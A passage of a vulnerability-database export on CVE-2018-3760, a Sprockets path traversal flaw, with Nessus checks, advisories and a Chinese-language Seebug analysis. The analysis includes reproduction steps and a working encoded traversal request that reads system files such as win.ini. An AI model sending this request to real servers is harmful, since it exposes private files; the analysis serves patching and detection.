audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ruby2.5-rubygem-sprockets-3.7.2-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity 
> 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.5-rubygem-sprockets\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-23T16:06:19", "description": "Orange Tsai discovered a path traversal flaw in ruby-sprockets, a Rack-based asset packaging system. A remote attacker can take advantage of this flaw to read arbitrary files outside an application's root directory via specially crafted requests, when the Sprockets server is used in production.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-07-10T00:00:00", "type": "nessus", "title": "Debian DSA-4242-1 : ruby-sprockets - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2018-11-13T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ruby-sprockets", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4242.NASL", "href": "https://www.tenable.com/plugins/nessus/110968", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4242. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110968);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/13 12:30:47\");\n\n script_cve_id(\"CVE-2018-3760\");\n script_xref(name:\"DSA\", value:\"4242\");\n\n script_name(english:\"Debian DSA-4242-1 : ruby-sprockets - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Orange Tsai discovered a path traversal flaw in ruby-sprockets, a\nRack-based asset packaging system. A remote attacker can take\nadvantage of this flaw to read arbitrary files outside an\napplication's root directory via specially crafted requests, when the\nSprockets server is used in production.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=901913\"\n );\n # https://security-tracker.debian.org/tracker/source-package/ruby-sprockets\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e0c4015a\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/ruby-sprockets\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4242\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ruby-sprockets packages.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 3.7.0-1+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:ruby-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"ruby-sprockets\", reference:\"3.7.0-1+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:12", "bounty": 1500.0, "description": "There is an information leak vulnerability in Sprockets. 
This vulnerability\nhas been assigned the CVE identifier CVE-2018-3760.\n\nVersions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower.\nNot affected: NONE\nFixed Versions: 4.0.0.beta8, 3.7.2, 2.12.5\n\nImpact\n------\nSpecially crafted requests can be used to access files that exists on\nthe filesystem that is outside an application's root directory, when the Sprockets server is\nused in production.\n\nAll users running an affected release should either upgrade or use one of the work arounds immediately.\n\nReleases\n--------\nThe 4.0.0.beta8, 3.7.2 and 2.12.5 releases are available at the normal locations.\n\nWorkarounds\n-----------\nIn Rails applications, work around this issue, set `config.assets.compile = false` and\n`config.public_file_server.enabled = true` in an initializer and precompile the assets.\n\nThis work around will not be possible in all hosting environments and upgrading is advised.\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for the three supported release series.\nThey are in git-am format and consist of a single changeset.\n\n* 4-0-fix-path-traversal.patch - Patch for the 4.0.x release series\n* 3-7-fix-path-traversal.patch - Patch for the 3.7.x release series\n* 2-12-fix-path-traversal.patch - Patch for the 2.12.x release series\n\nCredits\n-------\n\nThanks to Orange Tsai from DEVCORE for reporting this issue.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-22T10:42:20", "type": "hackerone", "title": "Ruby on Rails: Path Traversal on Default Installed Rails Application 
(Asset Pipeline)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-19T16:01:09", "id": "H1:307808", "href": "https://hackerone.com/reports/307808", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "debiancve": [{"lastseen": "2021-12-14T17:52:31", "description": "There is an information leak vulnerability in Sprockets. Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower. Specially crafted requests can be used to access files that exists on the filesystem that is outside an application's root directory, when the Sprockets server is used in production. 
All users running an affected release should either upgrade or use one of the work arounds immediately.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-06-26T19:29:00", "type": "debiancve", "title": "CVE-2018-3760", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-06-26T19:29:00", "id": "DEBIANCVE:CVE-2018-3760", "href": "https://security-tracker.debian.org/tracker/CVE-2018-3760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "github": [{"lastseen": "2022-05-13T12:33:36", "description": "Specially crafted requests can be used to access files that exist on the filesystem that is outside an application's root directory, when the Sprockets server is used in production.\n \nAll users running an affected release should either upgrade or use one of the work arounds immediately.\n \nWorkaround:\n \nIn Rails applications, work around this issue, set `config.assets.compile = false` and `config.public_file_server.enabled = true` in an initializer and precompile the assets.\n\nThis work around will not be possible in all hosting environments and upgrading is 
advised.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-20T22:18:58", "type": "github", "title": "High severity vulnerability that affects sprockets", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2021-12-02T20:12:00", "id": "GHSA-PR3H-JJHJ-573X", "href": "https://github.com/advisories/GHSA-pr3h-jjhj-573x", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2018-08-08T05:53:47", "description": "### \u6f0f\u6d1e\u516c\u544a\r\n\u8be5\u6f0f\u6d1e\u7531\u5b89\u5168\u7814\u7a76\u4eba\u5458 Orange Tsai\u53d1\u73b0\u3002\u6f0f\u6d1e\u516c\u544a\u6765\u81ea https://groups.google.com/forum/#!topic/rubyonrails-security/ft_J--l55fM\r\n```\r\nThere is an information leak vulnerability in Sprockets. 
This vulnerability\r\nhas been assigned the CVE identifier CVE-2018-3760.\r\n\r\nVersions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower.\r\nNot affected: NONE\r\nFixed Versions: 4.0.0.beta8, 3.7.2, 2.12.5\r\n\r\nImpact\r\n------\r\nSpecially crafted requests can be used to access files that exists on\r\nthe filesystem that is outside an application's root directory, when the Sprockets server is\r\nused in production.\r\n\r\nAll users running an affected release should either upgrade or use one of the work arounds immediately.\r\n```\r\n\r\n\u5f71\u54cd\u9762\uff1a development servers\uff0c\u4e14\u5f00\u542f\u4e86 config.assets.compile\r\n\r\n### \u6f0f\u6d1e\u590d\u73b0\r\n\u672c\u5730\u5b89\u88c5\u597druby\u548crails\u3002\u4ee5ruby 2.4.4 \uff0crails v5.0.7\u4e3a\u4f8b\uff1a\r\n```\r\n$ gem rails -v 5.0.7\r\n$ rails new blog && cd blog\r\n```\r\n\r\n\u6b64\u65f6blog\u8fd9\u4e2arails\u9879\u76ee\u4f7f\u7528\u7684sprockets\u7248\u672c\u662f3.7.2\uff08fixed\uff09\u3002\u4fee\u6539blog\u76ee\u5f55\u4e0b\u7684Gemfile.lock\u7b2c122\u884c\uff1a\r\n```\r\nsprockets (3.7.1)\r\n```\r\n\r\n\u4fee\u6539\u914d\u7f6e\u6587\u4ef6 config/environments/production.rb\uff1a\r\n```\r\nconfig.assets.compile = true\r\n```\r\n\r\n\u5728blog\u76ee\u5f55\u4e0b\u6267\u884c\r\n```\r\n$ bundle install\r\n$ rails server \r\n * Min threads: 5, max threads: 5 \r\n * Environment: development \r\n * Listening on tcp://0.0.0.0:3000 \r\n Use Ctrl-C to stop\r\n```\r\n\r\npayload:\r\n```\r\nGET /assets/file:%2f%2f//C:/chybeta/blog/app/assets/config/%252e%252e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2fWindows/win.ini\r\n```\r\n\r\nwin\u5e73\u53f0\uff1a\r\n\r\n\r\n\r\nlinux\u5e73\u53f0\r\n\r\n\r\n\r\n### 
\u6f0f\u6d1e\u5206\u6790\r\n\u6ce8\uff1a\u4e3a\u660e\u767d\u8d77\u89c1\uff0c\u8bb8\u591a\u5206\u6790\u76f4\u63a5\u5199\u5728\u4ee3\u7801\u6ce8\u91ca\u90e8\u5206\uff0c\u8bf7\u7559\u610f\u3002\r\n\r\n\u95ee\u9898\u51fa\u5728sprockets\uff0c\u5b83\u7528\u6765\u68c0\u67e5 JavaScript \u6587\u4ef6\u7684\u76f8\u4e92\u4f9d\u8d56\u5173\u7cfb\uff0c\u7528\u4ee5\u4f18\u5316\u7f51\u9875\u4e2d\u5f15\u5165\u7684js\u6587\u4ef6\uff0c\u4ee5\u907f\u514d\u52a0\u8f7d\u4e0d\u5fc5\u8981\u7684js\u6587\u4ef6\u3002\u5f53\u8bbf\u95ee\u5982http://127.0.0.1:3000/assets/foo.js\u65f6\uff0c\u4f1a\u8fdb\u5165server.rb:\r\n```\r\ndef call(env)\r\n start_time = Time.now.to_f\r\n time_elapsed = lambda { ((Time.now.to_f - start_time) * 1000).to_i }\r\n\r\n if !['GET', 'HEAD'].include?(env['REQUEST_METHOD'])\r\n return method_not_allowed_response\r\n end\r\n\r\n msg = \"Served asset #{env['PATH_INFO']} -\"\r\n\r\n # Extract the path from everything after the leading slash\r\n path = Rack::Utils.unescape(env['PATH_INFO'].to_s.sub(/^\\//, ''))\r\n\r\n # Strip fingerprint\r\n if fingerprint = path_fingerprint(path)\r\n path = path.sub(\"-#{fingerprint}\", '')\r\n end\r\n # \u6b64\u65f6path\u503c\u4e3a file:///C:/chybeta/blog/app/assets/config/%2e%2e/%2e./%2e./%2e./%2e./%2e./%2e./Windows/win.ini\r\n\r\n # URLs containing a `\"..\"` are rejected for security reasons.\r\n if forbidden_request?(path)\r\n return forbidden_response(env)\r\n end\r\n\r\n ...\r\n\r\n asset = find_asset(path, options)\r\n ...\r\n```\r\nforbidden_request\u7528\u6765\u5bf9path\u8fdb\u884c\u68c0\u67e5\uff0c\u662f\u5426\u5305\u542b..\u4ee5\u9632\u6b62\u8def\u5f84\u7a7f\u8d8a\uff0c\u662f\u5426\u662f\u7edd\u5bf9\u8def\u5f84\uff1a\r\n```\r\nprivate\r\n def forbidden_request?(path)\r\n # Prevent access to files elsewhere on the file system\r\n #\r\n # http://example.org/assets/../../../etc/passwd\r\n #\r\n path.include?(\"..\") || 
absolute_path?(path)\r\nend\r\n```\r\n\r\n\u5982\u679c\u8bf7\u6c42\u4e2d\u5305\u542b..\u5373\u8fd4\u56de\u771f\uff0c\u7136\u540e\u8fd4\u56deforbidden_response(env)\u4fe1\u606f\u3002\r\n\r\n\r\n\r\n\u56de\u5230call\u51fd\u6570\uff0c\u8fdb\u5165find_asset(path, options)\uff0c\u5728 lib/ruby/gems/2.4.0/gems/sprockets-3.7.1/lib/sprockets/base.rb:63:\r\n```\r\n# Find asset by logical path or expanded path.\r\ndef find_asset(path, options = {})\r\n uri, _ = resolve(path, options.merge(compat: false))\r\n if uri\r\n # \u89e3\u6790\u51fa\u6765\u7684 uri \u503c\u4e3a file:///C:/chybeta/blog/app/assets/config/%2e%2e/%2e./%2e./%2e./%2e./%2e./%2e./Windows/win.ini\r\n load(uri)\r\n end\r\nend\r\n```\r\n\r\n\u8ddf\u8fdbload\uff0c\u5728 lib/ruby/gems/2.4.0/gems/sprockets-3.7.1/lib/sprockets/loader.rb:32 \u3002\u4ee5\u8bf7\u6c42GET /assets/file:%2f%2f//C:/chybeta/blog/app/assets/config/%252e%252e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2fWindows/win.ini\u4e3a\u4f8b\uff0c\u5176\u4e00\u6b65\u6b65\u7684\u89e3\u6790\u8fc7\u7a0b\u89c1\u4e0b\u6ce8\u91ca\uff1a\r\n```\r\ndef load(uri)\r\n # \u6b64\u65f6 uri \u5df2\u7ecf\u7ecf\u8fc7\u4e86\u4e00\u6b21\u7684url\u89e3\u7801 \r\n # \u5176\u503c\u4e3a file:///C:/chybeta/blog/app/assets/config/%2e%2e/%2e./%2e./%2e./%2e./%2e./%2e./Windows/win.ini\r\n unloaded = UnloadedAsset.new(uri, self)\r\n if unloaded.params.key?(:id)\r\n ...\r\n else\r\n asset = fetch_asset_from_dependency_cache(unloaded) do |paths|\r\n # When asset is previously generated, its \"dependencies\" are stored in the cache.\r\n # The presence of `paths` indicates dependencies were stored.\r\n # We can check to see if the dependencies have not changed by \"resolving\" them and\r\n # generating a digest key from the resolved entries. 
If this digest key has not\r\n # changed the asset will be pulled from cache.\r\n #\r\n # If this `paths` is present but the cache returns nothing then `fetch_asset_from_dependency_cache`\r\n # will confusingly be called again with `paths` set to nil where the asset will be\r\n # loaded from disk.\r\n\r\n # \u5f53\u5b58\u5728\u7f13\u5b58\u65f6\r\n if paths\r\n load_from_unloaded(unloaded)\r\n digest = DigestUtils.digest(resolve_dependencies(paths))\r\n if uri_from_cache = cache.get(unloaded.digest_key(digest), true)\r\n asset_from_cache(UnloadedAsset.new(uri_from_cache, self).asset_key)\r\n end\r\n else\r\n # \u5f53\u7f13\u5b58\u4e0d\u5b58\u5728\uff0c\u4e3b\u8981\u8003\u8651\u8fd9\u4e2a\r\n load_from_unloaded(unloaded)\r\n end\r\n end\r\n end\r\n Asset.new(self, asset)\r\nend\r\n```\r\n\u8ddf\u5165UnloadedAsset.new\r\n```\r\nclass UnloadedAsset\r\n def initialize(uri, env)\r\n @uri = uri.to_s\r\n @env = env\r\n @compressed_path = URITar.new(uri, env).compressed_path\r\n @params = nil # lazy loaded\r\n @filename = nil # lazy loaded \u5177\u4f53\u5b9e\u73b0\u89c1\u4e0b\u9762\r\n end\r\n ...\r\n # Internal: Full file path without schema\r\n #\r\n # This returns a string containing the full path to the asset without the schema.\r\n # Information is loaded lazilly since we want `UnloadedAsset.new(dep, self).relative_path`\r\n # to be fast. 
Calling this method the first time allocates an array and a hash.\r\n #\r\n # Example\r\n #\r\n # If the URI is `file:///Full/path/app/assets/javascripts/application.js\"` then the\r\n # filename would be `\"/Full/path/app/assets/javascripts/application.js\"`\r\n #\r\n # Returns a String.\r\n\r\n # \u7531\u4e8e\u91c7\u7528\u4e86Lazy loaded\uff0c\u5f53\u7b2c\u4e00\u6b21\u8bbf\u95ee\u5230filename\u8fd9\u4e2a\u5c5e\u6027\u65f6\uff0c\u4f1a\u8c03\u7528\u4e0b\u9762\u8fd9\u4e2a\u65b9\u6cd5\r\n def filename\r\n unless @filename\r\n load_file_params # \u8ddf\u8fdb\u53bb\uff0c\u89c1\u4e0b\r\n end\r\n @filename\r\n end\r\n ...\r\n # \u7b2c 130 \u884c\r\n private\r\n # Internal: Parses uri into filename and params hash\r\n #\r\n # Returns Array with filename and params hash\r\n def load_file_params\r\n # uri \u4e3a file:///C:/chybeta/blog/app/assets/config/%2e%2e/%2e./%2e./%2e./%2e./%2e./%2e./Windows/win.ini\r\n @filename, @params = URIUtils.parse_asset_uri(uri)\r\n end\r\n```\r\n\u8ddf\u5165URIUtils.parse_asset_uri\r\n```\r\ndef parse_asset_uri(uri)\r\n # uri \u4e3a file:///C:/chybeta/blog/app/assets/config/%2e%2e/%2e./%2e./%2e./%2e./%2e./%2e./Windows/win.ini\r\n # \u8ddf\u8fdb split_file_uri\r\n scheme, _, path, query = split_file_uri(uri)\r\n ...\r\n return path, parse_uri_query_params(query)\r\nend\r\n\r\n...# \u7701\u7565\r\n\r\ndef split_file_uri(uri)\r\n scheme, _, host, _, _, path, _, query, _ = URI.split(uri)\r\n # \u6b64\u65f6\u89e3\u6790\u51fa\u7684\u51e0\u4e2a\u53d8\u91cf\u5982\u4e0b\uff1a \r\n # scheme: file\r\n # host: \r\n # path: /C:/chybeta/blog/app/assets/config/%2e%2e/%2e./%2e./%2e./%2e./%2e./%2e./Windows/win.ini\r\n # query: \r\n path = URI::Generic::DEFAULT_PARSER.unescape(path)\r\n # \u8fd9\u91cc\u7ecf\u8fc7\u7b2c\u4e8c\u6b21\u7684url\u89e3\u7801\r\n # path\uff1a/C:/chybeta/blog/app/assets/config/../../../../../../../Windows/win.ini\r\n path.force_encoding(Encoding::UTF_8)\r\n\r\n # Hack for parsing Windows \"file:///C:/Users/IEUser\" paths\r\n 
path.gsub!(/^\\/([a-zA-Z]:)/, '\\1'.freeze)\r\n # path: C:/chybeta/blog/app/assets/config/../../../../../../../Windows/win.ini\r\n [scheme, host, path, query]\r\nend\r\n```\r\n\r\n\r\n\u5728\u5b8c\u6210\u4e86filename\u89e3\u6790\u540e\uff0c\u6211\u4eec\u56de\u5230load\u51fd\u6570\u672b\u5c3e\uff0c\u8fdb\u5165load_from_unloaded(unloaded):\r\n\r\n\r\n\r\n```\r\n# Internal: Loads an asset and saves it to cache\r\n #\r\n # unloaded - An UnloadedAsset\r\n #\r\n # This method is only called when the given unloaded asset could not be\r\n # successfully pulled from cache.\r\n def load_from_unloaded(unloaded)\r\n unless file?(unloaded.filename)\r\n raise FileNotFound, \"could not find file: #{unloaded.filename}\"\r\n end\r\n\r\n load_path, logical_path = paths_split(config[:paths], unloaded.filename)\r\n unless load_path\r\n raise FileOutsidePaths, \"#{unloaded.filename} is no longer under a load path: #{self.paths.join(', ')}\"\r\n end\r\n ....\r\n```\r\n\r\n\u4e3b\u8981\u662f\u8fdb\u884c\u4e86\u4e24\u4e2a\u68c0\u67e5\uff1a\u6587\u4ef6\u662f\u5426\u5b58\u5728\u548c\u662f\u5426\u5728\u5408\u89c4\u76ee\u5f55\u91cc\u3002\u4e3b\u8981\u5173\u6ce8\u7b2c\u4e8c\u4e2a\u68c0\u6d4b\u3002\u5176\u4e2dconfig[:paths]\u662f\u5141\u8bb8\u7684\u8def\u5f84\uff0c\u800cunloaded.filename\u662f\u8bf7\u6c42\u7684\u8def\u5f84\u6587\u4ef6\u540d\u3002\u8ddf\u5165 lib/ruby/gems/2.4.0/gems/sprockets-3.7.2/lib/sprockets/path_utils.rb:120\uff1a\r\n```\r\n# Internal: Detect root path and base for file in a set of paths.\r\n#\r\n# paths - Array of String paths\r\n# filename - String path of file expected to be in one of the paths.\r\n#\r\n# Returns [String root, String path]\r\ndef paths_split(paths, filename)\r\n # \u5bf9paths\u4e2d\u7684\u6bcf\u4e00\u4e2a path\r\n paths.each do |path|\r\n # \u5982\u679csubpath\u4e0d\u4e3a\u7a7a\r\n if subpath = split_subpath(path, filename)\r\n # \u5219\u8fd4\u56de path, subpath\r\n return path, subpath\r\n end\r\n end\r\n 
nil\r\nend\r\n```\r\n\r\n\u7ee7\u7eed\u8ddf\u5165split_subpath\uff0c lib/ruby/gems/2.4.0/gems/sprockets-3.7.2/lib/sprockets/path_utils.rb:103\u3002\u5047\u8bbe\u4e0a\u9762\u4f20\u5165\u7684path\u53c2\u6570\u662f\u3002\r\n```\r\n# Internal: Get relative path for root path and subpath.\r\n #\r\n # path - String path\r\n # subpath - String subpath of path\r\n #\r\n # Returns relative String path if subpath is a subpath of path, or nil if\r\n # subpath is outside of path.\r\n def split_subpath(path, subpath)\r\n return \"\" if path == subpath\r\n # \u6b64\u65f6 path \u4e3a C:/chybeta/blog/app/assets/config/../../../../../../../Windows/win.ini\r\n path = File.join(path, '')\r\n # \u6b64\u65f6 path \u4e3a C:/chybeta/blog/app/assets/config/../../../../../../../Windows/win.ini/\r\n # \u4e0e\u4f20\u5165\u7684\u7edd\u5bf9\u8def\u5f84\u8fdb\u884c\u6bd4\u8f83\r\n # \u5982\u679c\u4ee5 \u5141\u8bb8\u7684\u8def\u5f84 \u4e3a\u5f00\u5934\uff0c\u5219\u68c0\u67e5\u901a\u8fc7\u3002\r\n if subpath.start_with?(path)\r\n subpath[path.length..-1]\r\n else\r\n nil\r\n end\r\n end\r\n\t```\r\n\u901a\u8fc7\u68c0\u67e5\u540e\uff0c\u5728load_from_unloaded\u672b\u5c3e\u5373\u8fdb\u884c\u4e86\u8bfb\u53d6\u7b49\u64cd\u4f5c\uff0c\u4ece\u800c\u901a\u8fc7\u8def\u5f84\u7a7f\u8d8a\u9020\u6210\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u3002\r\n\r\n\u5982\u679c\u6587\u4ef6\u4ee5.erb\u7ed3\u5c3e\uff0c\u5219\u4f1a\u76f4\u63a5\u6267\u884c\uff1a\r\n\r\n### \u8865\u4e01\r\n\r\n\r\n\r\n\u5728server.rb\u4e2d\uff0c\u589e\u52a0\u5173\u952e\u5b57\u8fc7\u6ee4://\u3002\r\n\r\n### Reference\r\n* https://github.com/rails/sprockets/commit/c09131cf5b2c479263939c8582e22b98ed616c5f\r\n* https://blog.heroku.com/rails-asset-pipeline-vulnerability\r\n* https://twitter.com/orange_8361/status/1009309271698300928", "cvss3": {}, "published": "2018-08-08T00:00:00", "type": "seebug", "title": "Ruby on Rails \u8def\u5f84\u7a7f\u8d8a\u4e0e\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e(CVE-2018-3760)\u5206\u6790", "bulletinFamily": 
"exploit", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2018-08-08T00:00:00", "id": "SSV:97466", "href": "https://www.seebug.org/vuldb/ssvid-97466", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T17:15:38", "description": "There is an information leak vulnerability in Sprockets. Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower. Specially crafted requests can be used to access files that exists on the filesystem that is outside an application's root directory, when the Sprockets server is used in production. All users running an affected release should either upgrade or use one of the work arounds immediately.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-26T19:29:00", "type": "cve", "title": "CVE-2018-3760", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2019-10-09T23:40:00", "cpe": ["cpe:/a:sprockets_project:sprockets:2.12.4", "cpe:/a:redhat:cloudforms:4.6", "cpe:/a:sprockets_project:sprockets:4.0.0", "cpe:/o:redhat:enterprise_linux:7.6", 
